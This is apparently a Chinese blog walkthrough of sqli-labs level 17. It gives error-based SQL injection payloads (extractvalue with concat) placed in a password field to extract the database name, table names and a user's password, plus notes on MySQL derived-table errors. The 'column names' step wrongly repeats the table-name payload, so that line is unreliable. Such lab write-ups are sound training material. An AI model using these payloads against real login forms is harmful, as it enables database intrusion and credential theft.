SQLI DUMB SERIES-17
(1)无论怎么输入username,都没有回显。尝试改变password的输入。找到了闭合方式:单引号
(2)报错注入:
爆库名
1 | admin&passwd=admin ' and extractvalue(1,concat(0x7e,(select database())))and ' # |
爆表名:
1 | uname=admin&passwd=admin ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ' #&submit=Submit |
爆users表的列名
1 | uname=admin&passwd=admin ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ' #&submit=Submit |
爆值:
1 | uname=admin&passwd=admin ' and extractvalue(1,concat(0x7e,(select password from (select password from users where username=' Dumb ' )as a))) and ' #&submit=Submit |
注意此处查询需要嵌套查询,否则会出现错误:You can't specify target table 'table name' for update in FROM clause
也需要对查询的结果命名,否则会出现错误:Every derived table must have its own alias
由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步